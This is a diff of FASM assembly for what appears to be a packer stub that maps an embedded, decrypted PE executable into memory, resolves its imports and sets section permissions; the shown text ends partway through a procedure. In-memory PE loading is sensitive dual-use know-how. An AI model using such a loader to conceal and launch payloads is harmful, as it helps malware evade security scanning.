-	writeWithNewLine createStringLoadingFilesAPIs, str1, le_exit_error
-	stdcall loadImportTable, [APITable], [loaded_file]
-	test eax,eax
-	jz le_exit_error
-
-	;set the correct permissions for each section
-	writeNewLineToLog APITable
-	writeWithNewLine createStringSettingPermissions, str1, le_exit_error
-	mov eax,[input_image]
-	add eax,4
-	mov ebx,INFILE_SIZE
-	sub ebx,4
-	stdcall setPermissions, [APITable], [image_file_header], eax, ebx
-	test eax,eax
-	jz le_exit_error
-
-le_exit_success:
-	popad
-	mov eax,1
-	ret
-
-le_exit_error:
-	popad
-	mov eax,0
-	ret
-
-endp
-
-;load the APIs in the import table
-proc loadImportTable, APITable:DWORD, image_base:DWORD
-
-local str1[256]:BYTE, import_table:DWORD, null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE
-
-	pushad
-	;find import table in data directory
-	mov edx,[image_base]
-	mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
-	add eax,edx
-	add eax,4
-	;image file header now in eax
-	add eax,sizeof.IMAGE_FILE_HEADER
-	lea eax,[eax+IMAGE_OPTIONAL_HEADER32.DataDirectory]
-	;first data directory entry now in eax
-	add eax,sizeof.IMAGE_DATA_DIRECTORY
-	;import data directory entry now in eax
-	mov eax,[eax+IMAGE_DATA_DIRECTORY.VirtualAddress]
-	add eax,edx
-	;pointer to import table now in eax
-	mov [import_table],eax
-	writeWithNewLine createStringFoundImportTable, str1, le_exit_error
-	writeRegisterToLog APITable, [import_table]
-	test eax,eax
-	jz pit_exit_error
-
-	;init null directory entry
-	lea esi,[null_directory_entry]
-	mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
-	mov al,0
-pit_init_null_directory_loop:
-	mov [esi],al
-	inc esi
-	dec ecx
-	jnz pit_init_null_directory_loop
-
-	mov ebx,[import_table]
-	;iterate over the directory tables
-pit_next_directory_entry:
-	lea esi,[null_directory_entry]
-	mov edi,ebx
-	mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
-	rep cmpsb
-	je pit_exit_success
-	;load APIs of this directory
-	stdcall loadImportDirectoryTable, [APITable], [image_base], ebx
-	test eax,eax
-	jz pit_exit_error
-	;next entry
-	add ebx,sizeof.IMAGE_IMPORT_DESCRIPTOR
-	jmp pit_next_directory_entry
-
-pit_exit_success:
-	popad
-	mov eax,1
-	ret
-
-pit_exit_error:
-	popad
-	mov eax,0
-	ret
-endp
-
-;loads the APIs
-proc loadImportDirectoryTable stdcall, APITable:DWORD, image_base:DWORD, directory_entry:DWORD
-
-local str1[256]:BYTE, lookup_table:DWORD, import_address_table:DWORD, dll_image_base:DWORD
-
-	pushad
-	;write info about data directory table to logfile
-	writeNewLineToLog APITable
-	test eax,eax
-	jz lidt_exit_error
-	writeWithNewLine createStringProcessImportDirectory, str1, lidt_exit_error
-	mov eax,[directory_entry]
-	mov eax,[eax+IMAGE_IMPORT_DESCRIPTOR.Name_]
-	add eax,[image_base]
-	mov ebx,eax
-	;pointer to dll name in ebx
-	writeLog APITable, eax
-	test eax,eax
-	jz lidt_exit_error
-	writeNewLineToLog APITable
-	test eax,eax
-	jz lidt_exit_error
-
-	;load the corresponding dll
-	invoke LoadLibrary, ebx
-	test eax,eax
-	jz lidt_exit_error
-	mov [dll_image_base],eax
-
-	;read pointer to the api tables
-	mov edx,[directory_entry]
-	mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
-	add eax,[image_base]
-	mov [lookup_table],eax
-	mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
-	add eax,[image_base]
-	mov [import_address_table],eax
-
-	;index to current API
-	sub ecx,ecx
-	;iterate the lookup_table entries
-lidt_next_lookup_entry:
-	mov eax,[lookup_table]
-	add eax,ecx
-	mov eax,[eax]
-	test eax,eax
-	jz lidt_exit_success
-	mov ebx,eax
-	and eax,IMAGE_ORDINAL_FLAG32
-	jnz lidt_byordinal
-lidt_byname:
-	createStringName str1
-	lea eax,[str1]
-	writeLog APITable, eax
-	test eax,eax
-	jz lidt_exit_error
-	add ebx,[image_base]
-	lea ebx,[ebx+IMAGE_IMPORT_BY_NAME.Name_]
-	mov eax,ebx
-	writeLog APITable, eax
-	test eax,eax
-	jz lidt_exit_error
-	writeNewLineToLog APITable
-	test eax,eax
-	jz lidt_exit_error
-	;API name pointer in ebx
-	push ecx
-	invoke GetProcAddress, [dll_image_base], ebx
-	pop ecx
-	test eax,eax
-	jz lidt_exit_error
-	mov ebx,[import_address_table]
-	add ebx,ecx
-	mov [ebx],eax
-	;fetch next API
-	add ecx,4
-	jmp lidt_next_lookup_entry
-
-lidt_byordinal:
-	createStringOrdinal str1
-	lea eax,[str1]
-	writeLog APITable, eax
-	test eax,eax
-	jz lidt_exit_error
-	;remove the ordinal flag
-	xor ebx,IMAGE_ORDINAL_FLAG32
-	mov eax,ebx
-	writeRegisterToLog APITable, eax
-	test eax,eax
-	jz pit_exit_error
-	;API ordinal in ebx
-	push ecx
-	invoke GetProcAddress, [dll_image_base], ebx
-	pop ecx
-	test eax,eax
-	jz lidt_exit_error
-	mov ebx,[import_address_table]
-	add ebx,ecx
-	mov [ebx],eax
-	;fetch next API
-	add ecx,4
-	jmp lidt_next_lookup_entry
-
-lidt_exit_success:
-	popad
-	mov eax,1
-	ret
-
-lidt_exit_error:
-	popad
-	mov eax,0
-	ret
-endp;
-
-;sets the memory permissions for each section
-proc setPermissions stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
-file_image_size:DWORD
-
-local number_of_sections:DWORD, image_base:DWORD, section_headers:DWORD,\
-pe_header_size:DWORD, str1[256]:BYTE, vprotect_ret:DWORD
-
-	pushad
-	;find section header
-	mov edx,[image_file_header]
-	sub eax,eax
-	mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
-	mov [number_of_sections],eax
-	add edx,sizeof.IMAGE_FILE_HEADER
-	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
-	mov [image_base],eax
-	;search for section header
-	lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
-	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
-	mov edx,sizeof.IMAGE_DATA_DIRECTORY
-	mul edx
-	add eax,ebx
-	;first section header found
-	mov [section_headers],eax
-	mov eax,sizeof.IMAGE_SECTION_HEADER
-	mov edx,[number_of_sections]
-	mul edx
-	;end of section header sections found
-	add eax,[section_headers]
-	mov ebx,[file_image_base]
-	sub eax,ebx
-	;unaligned size of pe header in eax
-	mov [pe_header_size],eax
-
-	;set pe header page read-only
-	mov edx,[APITable]
-	lea eax,[vprotect_ret]
-	stdcall dword [edx+VirtualProtect], [image_base], [pe_header_size], PAGE_READONLY, eax
-	test eax,eax
-	jz sp_exit_error
-
-	;some output for the user
-	writeRegisterToLog APITable, [image_base]
-	test eax,eax
-	jz sp_exit_error
-
-	;set the section page permissions
-	mov ecx,[number_of_sections]
-	mov ebx,[section_headers]
-sp_load_section_loop:
-	stdcall setSection, [APITable], ebx, [image_base], [file_image_base]
-	test eax,eax
-	jz sp_exit_error
-	add ebx,sizeof.IMAGE_SECTION_HEADER
-	dec ecx
-	jnz sp_load_section_loop
-
-sp_exit_success:
-	popad
-	mov eax,1
-	ret
-
-sp_exit_error:
-	popad
-	sub eax,eax
-	ret
-endp;
-
-;sets the complete image of the decrypted file writeable so
-;we can copy pe header and sections into into
-proc loadFile stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
-file_image_size:DWORD
-
-local number_of_sections:DWORD, image_base:DWORD, aux:DWORD,\
-str1[256]:BYTE, vprotect_ret:DWORD, section_headers:DWORD, pe_header_size:DWORD
-
-	pushad
-	;find section header
-	mov edx,[image_file_header]
-	sub eax,eax
-	mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
-	mov [number_of_sections],eax
-	add edx,sizeof.IMAGE_FILE_HEADER
-	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
-	mov [image_base],eax
-	;make the complete image writable
-	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
-	mov [aux],edx ;store edx, we need it later
-	lea edx,[vprotect_ret]
-	mov ebx,[APITable]
-	stdcall dword [ebx+VirtualProtect], [image_base], eax, PAGE_READWRITE, edx
-	test eax,eax
-	jz lf_exit_error
-
-	;some output for the user
-	writeWithNewLine createStringLoadedPEHeader, str1, lf_exit_error
-	writeRegisterToLog APITable, [image_base]
-	test eax,eax
-	jz lf_exit_error
-
-	mov edx,[aux] ;restore edx
-	;continue search for section header
-	lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
-	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
-	mov edx,sizeof.IMAGE_DATA_DIRECTORY
-	mul edx
-	add eax,ebx
-
-	;first section header found
-	mov [section_headers],eax
-	mov eax,sizeof.IMAGE_SECTION_HEADER
-	mov edx,[number_of_sections]
-	mul edx
-	;end of section header sections found
-	add eax,[section_headers]
-	mov ebx,[file_image_base]
-	sub eax,ebx
-	;unaligned size of pe header in eax
-	mov [pe_header_size],eax
-
-	;copy header to memory
-	mov edi,[image_base]
-	mov esi,[file_image_base]
-	mov ecx,[pe_header_size]
-	rep movsb
-
-	;load the sections
-	mov ecx,[number_of_sections]
-	mov ebx,[section_headers]
-lf_load_section_loop:
-	stdcall loadSection, [APITable], ebx, [image_base], [file_image_base]
-	test eax,eax
-	jz lf_exit_error
-	add ebx,sizeof.IMAGE_SECTION_HEADER
-	dec ecx
-	jnz lf_load_section_loop
-
-lf_exit_success:
-	popad
-	mov eax,[image_base]
-	ret
-
-lf_exit_error:
-	popad
-	mov eax,0
-	ret
-
-endp
-
-;load the corresponding section into memory
-proc loadSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
-file_image_base:DWORD
-
-local str1[256]:BYTE
-
-	pushad
-	;copy from file into memory
-	mov edx,[section_header]
-	mov edi,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
-	add edi,[image_base]
-	mov esi,[file_image_base]
-	add esi,[edx+IMAGE_SECTION_HEADER.PointerToRawData]
-	mov ecx,[edx+IMAGE_SECTION_HEADER.SizeOfRawData]
-	rep movsb
-
-	;print some infos to the log file
-	createStringLoaded str1
-	lea eax,[str1]
-	writeLog APITable, eax
-	test eax,eax
-	jz ls_exit_error
-	lea edi,[str1]
-	mov byte [edi+8],0
-	mov edx,[section_header]
-	lea esi,[edx+IMAGE_SECTION_HEADER._Name]
-	mov ecx,8
-	push edi
-	rep movsb
-	pop edi
-	writeLog APITable, edi
-	writeNewLineToLog APITable
-	mov edx,[section_header]
-	mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
-	add eax,[image_base]
-	writeRegisterToLog APITable, eax
-
-ls_exit_success:
-	popad
-	mov eax,1
-	ret
-
-ls_exit_error:
-	popad
-	sub eax,eax
-	ret
-
-endp
-
-;set the memory page permission for the corresponding section
-proc setSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
-file_image_base:DWORD
-
-local section_flags:DWORD, vprotect_ret:DWORD, str1[256]:BYTE
-
-	pushad
-	mov edx,[section_header]
-;section execute/read/write?
-	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
-	and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
-	cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
-	jne ssn_no_execute_read_write
-	mov eax,PAGE_EXECUTE_READWRITE
-	mov [section_flags],eax
-	jmp ssn_set_memory
-ssn_no_execute_read_write:
-	;section execute/read?
-	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
-	and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
-	cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
-	jne ssn_no_execute_read
-	mov eax,PAGE_EXECUTE_READ
-	mov [section_flags],eax
-	jmp ssn_set_memory
-ssn_no_execute_read:
-	;section read/write?
-	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
-	and ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
-	cmp ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
-	jne ssn_no_read_write
-	mov eax,PAGE_READWRITE
-	mov [section_flags],eax
-	jmp ssn_set_memory
-ssn_no_read_write:
-	;section read?
-	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
-	and ebx,IMAGE_SCN_MEM_READ
-	cmp ebx,IMAGE_SCN_MEM_READ
-	jne ssn_no_read
-	mov eax,PAGE_READONLY
-	mov [section_flags],eax
-	jmp ssn_set_memory
-ssn_no_read:
-	mov eax,PAGE_NOACCESS
-	mov [section_flags],eax
-
-	;set section permissions
-ssn_set_memory:
-	mov edx,[section_header]
-	mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
-	add eax,[image_base]
-	mov ebx,[edx+IMAGE_SECTION_HEADER.VirtualSize]
-	mov ecx,[APITable]
-	lea edx,[vprotect_ret]
-	stdcall dword [ecx+VirtualProtect],eax,ebx,[section_flags], edx
-	test eax,eax
-	jz ssn_exit_error
-
-	;some output for the user
-	mov edx,[section_header]
-	mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
-	add eax,[image_base]
-	writeRegisterToLog APITable, eax
-
-ssn_exit_success:
-	popad
-	mov eax,1
-	ret
-
-ssn_exit_error:
-	popad
-	sub eax,eax
-	ret
-endp;
-
-;check MZ und PE signature and return start of the image file header
-proc verifyPE stdcall, image_base:DWORD, section_size:DWORD
-
-local retval:DWORD
-
-	pushad
-	mov edx,[image_base]
-	mov ax,[edx+IMAGE_DOS_HEADER.e_magic]
-	cmp ax,IMAGE_DOS_SIGNATURE
-	jne vpe_exit_error
-	mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
-	add edx,eax
-	mov eax,dword [edx]
-	cmp eax,IMAGE_NT_SIGNATURE
-	jne vpe_exit_error
-	add edx,4
-	mov [retval],edx
-
-vpe_exit_success:
-	popad
-	mov eax,[retval]
-	ret
-
-vpe_exit_error:
-	popad
-	sub eax,eax
-	ret
-
-endp
-
-;First 4 bytes of data seciton contain a checksum
-;Verify that the checksum is correct
-;TODO: CHECKSUM SIZE is atm hardcoded
-proc verifyChecksum stdcall, section_address:DWORD, section_size:DWORD
-
-	pushad
-	mov ebx,dword [section_address]
-	mov eax,[ebx]
-	add ebx,4
-	mov ecx,[section_size]
-	sub ecx,4
-	;checksum is in eax
-	;pointer to file in ebx
-	;size of file in ecx
-	sub edi,edi
-vs_calc_cs:
-	sub edx,edx
-	mov dl,byte [ebx]
-	add edi,edx
-	inc ebx
-	dec ecx
-	jnz vs_calc_cs
-	;calculated checksum is in edi
-	cmp edi,eax
-	jne vs_exit_error
-
-vs_exit_success:
-	popad
-	mov eax,1
-	ret
-
-vs_exit_error:
-	popad
-	sub eax,eax
-	ret
-
+;Loads the exe which is stored in input_image
+;into memory and starts its execution
+proc loadExecutable stdcall APITable:DWORD,\
+input_image:DWORD
+
+local str1[256]:BYTE, ret_val:DWORD, image_file_header:DWORD,\
+loaded_file:DWORD
+
+	pushad
+	;verify checksum of packed executable
+	writeWithNewLine createStringVerifyChecksum, str1, le_exit_error
+	stdcall verifyChecksum, [input_image], INFILE_SIZE
+	test eax,eax
+	jz le_exit_error
+
+	;verify whether the content of the data section is pe
+	writeWithNewLine createStringVerifyPE, str1, le_exit_error
+	mov eax,[input_image]
+	add eax,4
+	stdcall verifyPE, eax, INFILE_SIZE
+	test eax,eax
+	mov [image_file_header],eax
+	jz le_exit_error
+
+	;copy pe header and sections into memory
+	writeNewLineToLog APITable
+	writeWithNewLine createStringMappingFileInMemory, str1, le_exit_error
+	mov eax,[input_image]
+	add eax,4
+	mov ebx,INFILE_SIZE
+	sub ebx,4
+	stdcall loadFile, [APITable], [image_file_header], eax, ebx
+	test eax,eax
+	mov [loaded_file],eax
+	jz le_exit_error
+
+	;loading import table
+	writeNewLineToLog APITable
+	writeWithNewLine createStringLoadingFilesAPIs, str1, le_exit_error
+	stdcall loadImportTable, [APITable], [loaded_file]
+	test eax,eax
+	jz le_exit_error
+
+	;set the correct permissions for each section
+	writeNewLineToLog APITable
+	writeWithNewLine createStringSettingPermissions, str1, le_exit_error
+	mov eax,[input_image]
+	add eax,4
+	mov ebx,INFILE_SIZE
+	sub ebx,4
+	stdcall setPermissions, [APITable], [image_file_header], eax, ebx
+	test eax,eax
+	jz le_exit_error
+
+le_exit_success:
+	popad
+	mov eax,1
+	ret
+
+le_exit_error:
+	popad
+	mov eax,0
+	ret
+
+endp
+
+;load the APIs in the import table
+proc loadImportTable, APITable:DWORD, image_base:DWORD
+
+local str1[256]:BYTE, import_table:DWORD, null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE
+
+	pushad
+	;find import table in data directory
+	mov edx,[image_base]
+	mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
+	add eax,edx
+	add eax,4
+	;image file header now in eax
+	add eax,sizeof.IMAGE_FILE_HEADER
+	lea eax,[eax+IMAGE_OPTIONAL_HEADER32.DataDirectory]
+	;first data directory entry now in eax
+	add eax,sizeof.IMAGE_DATA_DIRECTORY
+	;import data directory entry now in eax
+	mov eax,[eax+IMAGE_DATA_DIRECTORY.VirtualAddress]
+	add eax,edx
+	;pointer to import table now in eax
+	mov [import_table],eax
+	writeWithNewLine createStringFoundImportTable, str1, le_exit_error
+	writeRegisterToLog APITable, [import_table]
+	test eax,eax
+	jz pit_exit_error
+
+	;init null directory entry
+	lea esi,[null_directory_entry]
+	mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+	mov al,0
+pit_init_null_directory_loop:
+	mov [esi],al
+	inc esi
+	dec ecx
+	jnz pit_init_null_directory_loop
+
+	mov ebx,[import_table]
+	;iterate over the directory tables
+pit_next_directory_entry:
+	lea esi,[null_directory_entry]
+	mov edi,ebx
+	mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+	rep cmpsb
+	je pit_exit_success
+	;load APIs of this directory
+	stdcall loadImportDirectoryTable, [APITable], [image_base], ebx
+	test eax,eax
+	jz pit_exit_error
+	;next entry
+	add ebx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+	jmp pit_next_directory_entry
+
+pit_exit_success:
+	popad
+	mov eax,1
+	ret
+
+pit_exit_error:
+	popad
+	mov eax,0
+	ret
+endp
+
+;loads the APIs
+proc loadImportDirectoryTable stdcall, APITable:DWORD, image_base:DWORD, directory_entry:DWORD
+
+local str1[256]:BYTE, lookup_table:DWORD, import_address_table:DWORD, dll_image_base:DWORD
+
+	pushad
+	;write info about data directory table to logfile
+	writeNewLineToLog APITable
+	test eax,eax
+	jz lidt_exit_error
+	writeWithNewLine createStringProcessImportDirectory, str1, lidt_exit_error
+	mov eax,[directory_entry]
+	mov eax,[eax+IMAGE_IMPORT_DESCRIPTOR.Name_]
+	add eax,[image_base]
+	mov ebx,eax
+	;pointer to dll name in ebx
+	writeLog APITable, eax
+	test eax,eax
+	jz lidt_exit_error
+	writeNewLineToLog APITable
+	test eax,eax
+	jz lidt_exit_error
+
+	;load the corresponding dll
+	invoke LoadLibrary, ebx
+	test eax,eax
+	jz lidt_exit_error
+	mov [dll_image_base],eax
+
+	;read pointer to the api tables
+	mov edx,[directory_entry]
+	mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
+	add eax,[image_base]
+	mov [lookup_table],eax
+	mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
+	add eax,[image_base]
+	mov [import_address_table],eax
+
+	;index to current API
+	sub ecx,ecx
+	;iterate the lookup_table entries
+lidt_next_lookup_entry:
+	mov eax,[lookup_table]
+	add eax,ecx
+	mov eax,[eax]
+	test eax,eax
+	jz lidt_exit_success
+	mov ebx,eax
+	and eax,IMAGE_ORDINAL_FLAG32
+	jnz lidt_byordinal
+lidt_byname:
+	createStringName str1
+	lea eax,[str1]
+	writeLog APITable, eax
+	test eax,eax
+	jz lidt_exit_error
+	add ebx,[image_base]
+	lea ebx,[ebx+IMAGE_IMPORT_BY_NAME.Name_]
+	mov eax,ebx
+	writeLog APITable, eax
+	test eax,eax
+	jz lidt_exit_error
+	writeNewLineToLog APITable
+	test eax,eax
+	jz lidt_exit_error
+	;API name pointer in ebx
+	push ecx
+	invoke GetProcAddress, [dll_image_base], ebx
+	pop ecx
+	test eax,eax
+	jz lidt_exit_error
+	mov ebx,[import_address_table]
+	add ebx,ecx
+	mov [ebx],eax
+	;fetch next API
+	add ecx,4
+	jmp lidt_next_lookup_entry
+
+lidt_byordinal:
+	createStringOrdinal str1
+	lea eax,[str1]
+	writeLog APITable, eax
+	test eax,eax
+	jz lidt_exit_error
+	;remove the ordinal flag
+	xor ebx,IMAGE_ORDINAL_FLAG32
+	mov eax,ebx
+	writeRegisterToLog APITable, eax
+	test eax,eax
+	jz pit_exit_error
+	;API ordinal in ebx
+	push ecx
+	invoke GetProcAddress, [dll_image_base], ebx
+	pop ecx
+	test eax,eax
+	jz lidt_exit_error
+	mov ebx,[import_address_table]
+	add ebx,ecx
+	mov [ebx],eax
+	;fetch next API
+	add ecx,4
+	jmp lidt_next_lookup_entry
+
+lidt_exit_success:
+	popad
+	mov eax,1
+	ret
+
+lidt_exit_error:
+	popad
+	mov eax,0
+	ret
+endp;
+
+;sets the memory permissions for each section
+proc setPermissions stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
+file_image_size:DWORD
+
+local number_of_sections:DWORD, image_base:DWORD, section_headers:DWORD,\
+pe_header_size:DWORD, str1[256]:BYTE, vprotect_ret:DWORD
+
+	pushad
+	;find section header
+	mov edx,[image_file_header]
+	sub eax,eax
+	mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
+	mov [number_of_sections],eax
+	add edx,sizeof.IMAGE_FILE_HEADER
+	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
+	mov [image_base],eax
+	;search for section header
+	lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
+	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
+	mov edx,sizeof.IMAGE_DATA_DIRECTORY
+	mul edx
+	add eax,ebx
+	;first section header found
+	mov [section_headers],eax
+	mov eax,sizeof.IMAGE_SECTION_HEADER
+	mov edx,[number_of_sections]
+	mul edx
+	;end of section header sections found
+	add eax,[section_headers]
+	mov ebx,[file_image_base]
+	sub eax,ebx
+	;unaligned size of pe header in eax
+	mov [pe_header_size],eax
+
+	;set pe header page read-only
+	mov edx,[APITable]
+	lea eax,[vprotect_ret]
+	stdcall dword [edx+VirtualProtect], [image_base], [pe_header_size], PAGE_READONLY, eax
+	test eax,eax
+	jz sp_exit_error
+
+	;some output for the user
+	writeRegisterToLog APITable, [image_base]
+	test eax,eax
+	jz sp_exit_error
+
+	;set the section page permissions
+	mov ecx,[number_of_sections]
+	mov ebx,[section_headers]
+sp_load_section_loop:
+	stdcall setSection, [APITable], ebx, [image_base], [file_image_base]
+	test eax,eax
+	jz sp_exit_error
+	add ebx,sizeof.IMAGE_SECTION_HEADER
+	dec ecx
+	jnz sp_load_section_loop
+
+sp_exit_success:
+	popad
+	mov eax,1
+	ret
+
+sp_exit_error:
+	popad
+	sub eax,eax
+	ret
+endp;
+
+;sets the complete image of the decrypted file writeable so
+;we can copy pe header and sections into into
+proc loadFile stdcall, APITable:DWORD, image_file_header:DWORD, file_image_base:DWORD, \
+file_image_size:DWORD
+
+local number_of_sections:DWORD, image_base:DWORD, aux:DWORD,\
+str1[256]:BYTE, vprotect_ret:DWORD, section_headers:DWORD, pe_header_size:DWORD
+
+	pushad
+	;find section header
+	mov edx,[image_file_header]
+	sub eax,eax
+	mov ax,[edx+IMAGE_FILE_HEADER.NumberOfSections]
+	mov [number_of_sections],eax
+	add edx,sizeof.IMAGE_FILE_HEADER
+	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
+	mov [image_base],eax
+	;make the complete image writable
+	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
+	mov [aux],edx ;store edx, we need it later
+	lea edx,[vprotect_ret]
+	mov ebx,[APITable]
+	stdcall dword [ebx+VirtualProtect], [image_base], eax, PAGE_READWRITE, edx
+	test eax,eax
+	jz lf_exit_error
+
+	;some output for the user
+	writeWithNewLine createStringLoadedPEHeader, str1, lf_exit_error
+	writeRegisterToLog APITable, [image_base]
+	test eax,eax
+	jz lf_exit_error
+
+	mov edx,[aux] ;restore edx
+	;continue search for section header
+	lea ebx,[edx+IMAGE_OPTIONAL_HEADER32.DataDirectory]
+	mov eax,[edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes]
+	mov edx,sizeof.IMAGE_DATA_DIRECTORY
+	mul edx
+	add eax,ebx
+
+	;first section header found
+	mov [section_headers],eax
+	mov eax,sizeof.IMAGE_SECTION_HEADER
+	mov edx,[number_of_sections]
+	mul edx
+	;end of section header sections found
+	add eax,[section_headers]
+	mov ebx,[file_image_base]
+	sub eax,ebx
+	;unaligned size of pe header in eax
+	mov [pe_header_size],eax
+
+	;copy header to memory
+	mov edi,[image_base]
+	mov esi,[file_image_base]
+	mov ecx,[pe_header_size]
+	rep movsb
+
+	;load the sections
+	mov ecx,[number_of_sections]
+	mov ebx,[section_headers]
+lf_load_section_loop:
+	stdcall loadSection, [APITable], ebx, [image_base], [file_image_base]
+	test eax,eax
+	jz lf_exit_error
+	add ebx,sizeof.IMAGE_SECTION_HEADER
+	dec ecx
+	jnz lf_load_section_loop
+
+lf_exit_success:
+	popad
+	mov eax,[image_base]
+	ret
+
+lf_exit_error:
+	popad
+	mov eax,0
+	ret
+
+endp
+
+;load the corresponding section into memory
+proc loadSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
+file_image_base:DWORD
+
+local str1[256]:BYTE
+
+	pushad
+	;copy from file into memory
+	mov edx,[section_header]
+	mov edi,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add edi,[image_base]
+	mov esi,[file_image_base]
+	add esi,[edx+IMAGE_SECTION_HEADER.PointerToRawData]
+	mov ecx,[edx+IMAGE_SECTION_HEADER.SizeOfRawData]
+	rep movsb
+
+	;print some infos to the log file
+	createStringLoaded str1
+	lea eax,[str1]
+	writeLog APITable, eax
+	test eax,eax
+	jz ls_exit_error
+	lea edi,[str1]
+	mov byte [edi+8],0
+	mov edx,[section_header]
+	lea esi,[edx+IMAGE_SECTION_HEADER._Name]
+	mov ecx,8
+	push edi
+	rep movsb
+	pop edi
+	writeLog APITable, edi
+	writeNewLineToLog APITable
+	mov edx,[section_header]
+	mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add eax,[image_base]
+	writeRegisterToLog APITable, eax
+
+ls_exit_success:
+	popad
+	mov eax,1
+	ret
+
+ls_exit_error:
+	popad
+	sub eax,eax
+	ret
+
+endp
+
+;set the memory page permission for the corresponding section
+proc setSection stdcall, APITable:DWORD, section_header:DWORD, image_base:DWORD,\
+file_image_base:DWORD
+
+local section_flags:DWORD, vprotect_ret:DWORD, str1[256]:BYTE
+
+	pushad
+	mov edx,[section_header]
+;section execute/read/write?
+	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	jne ssn_no_execute_read_write
+	mov eax,PAGE_EXECUTE_READWRITE
+	mov [section_flags],eax
+	jmp ssn_set_memory
+ssn_no_execute_read_write:
+	;section execute/read?
+	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+	cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+	jne ssn_no_execute_read
+	mov eax,PAGE_EXECUTE_READ
+	mov [section_flags],eax
+	jmp ssn_set_memory
+ssn_no_execute_read:
+	;section read/write?
+	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	cmp ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+	jne ssn_no_read_write
+	mov eax,PAGE_READWRITE
+	mov [section_flags],eax
+	jmp ssn_set_memory
+ssn_no_read_write:
+	;section read?
+	mov ebx,[edx+IMAGE_SECTION_HEADER.Characteristics]
+	and ebx,IMAGE_SCN_MEM_READ
+	cmp ebx,IMAGE_SCN_MEM_READ
+	jne ssn_no_read
+	mov eax,PAGE_READONLY
+	mov [section_flags],eax
+	jmp ssn_set_memory
+ssn_no_read:
+	mov eax,PAGE_NOACCESS
+	mov [section_flags],eax
+
+	;set section permissions
+ssn_set_memory:
+	mov edx,[section_header]
+	mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add eax,[image_base]
+	mov ebx,[edx+IMAGE_SECTION_HEADER.VirtualSize]
+	mov ecx,[APITable]
+	lea edx,[vprotect_ret]
+	stdcall dword [ecx+VirtualProtect],eax,ebx,[section_flags], edx
+	test eax,eax
+	jz ssn_exit_error
+
+	;some output for the user
+	mov edx,[section_header]
+	mov eax,[edx+IMAGE_SECTION_HEADER.VirtualAddress]
+	add eax,[image_base]
